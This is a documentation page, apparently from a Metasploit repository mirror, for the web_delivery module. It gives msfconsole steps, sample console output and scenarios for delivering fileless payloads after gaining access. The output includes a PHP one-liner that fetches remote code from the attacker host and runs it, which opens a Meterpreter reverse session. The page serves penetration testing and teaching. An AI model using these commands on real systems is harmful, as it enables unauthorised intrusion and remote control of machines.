adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
ff2b8dcf99d76b17d7a482ca56162a073c0f1111
metasploit-gs/documentation/modules/exploit/multi/script/web_delivery.md
T

3.4 KiB
Raw Blame History

As a web server, the web_delivery module provides a stealthy way to deliver a payload during post exploitation because the payload does not touch the disk.

Currently, web_delivery supports three different languages for delivery: Python, PHP, and Powershell. You should be able to tell which one you can use based on the target environment you are in.

For example, if you gained access through a PHP application, it's safe to assume you can use PHP. If you're in a Windows server, such as Windows Server 2008, then it's probably safe to say the target supports Powershell.

Verification Steps

To be able to use the web_delivery module, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter.

At that point, you would use the web_delivery module like in the following example:

  1. Start msfconsole
  2. Run: use exploit/multi/script/web_delivery
  3. Run: set target 1 (1 is PHP. You can use show targets to see other options)
  4. Run: set PAYLOAD php/meterpreter/reverse_tcp (You can do show payloads to see what options are suitable for the target)
  5. Run: set LHOST IP (The IP the payload should connect back to)
  6. Do: run
  7. At this point, a handler is up for that payload, and the module should instruct you to execute a command.
  8. Copy the command. Depending on your pentesting scenario, you can either inject the command and get code execution, or run it from the target's shell and get a session:
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.23.1:4444 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z5inGkwCCQiz9
[*] Local IP: http://10.6.0.86:8080/z5inGkwCCQiz9
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));"
[*] Delivering Payload
[*] Sending stage (33684 bytes) to 172.16.23.134
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.134:41684) at 2016-03-02 11:41:34 -0600

Targets

Python

Python is a fairly popular language, especially on Unix-based systems. By default, it has come with Ubuntu Linux since 8.04, as well as Debian, and Mac OS X since 10.3.

PHP

PHP is a fairly popular language for web servers, especially Apache.

Powershell/Windows

Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2 are the first Windows versions to come with Powershell by default. Older Windows systems such as XP don't come with it by default, but it is still possible to see it installed on a corporate network.

Scenarios

Against a compromised web application

web_delivery would work nicely for a web application with a command execution vulnerability.

One way to approach this would be:

  1. Start exploit/multi/script/web_delivery
  2. Use Burp Suite to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution.
  3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.

Shell upgrade

web_delivery is also useful to upgrade a shell type payload to a Meterpreter one.

Here's how that can be done:

  1. Start exploit/multi/script/web_delivery that generates/
  2. In msfconsole, interact with the shell, and copy/paste the command.
  3. You should get a Meterpreter session.
Reference in New Issue View Git Blame Copy Permalink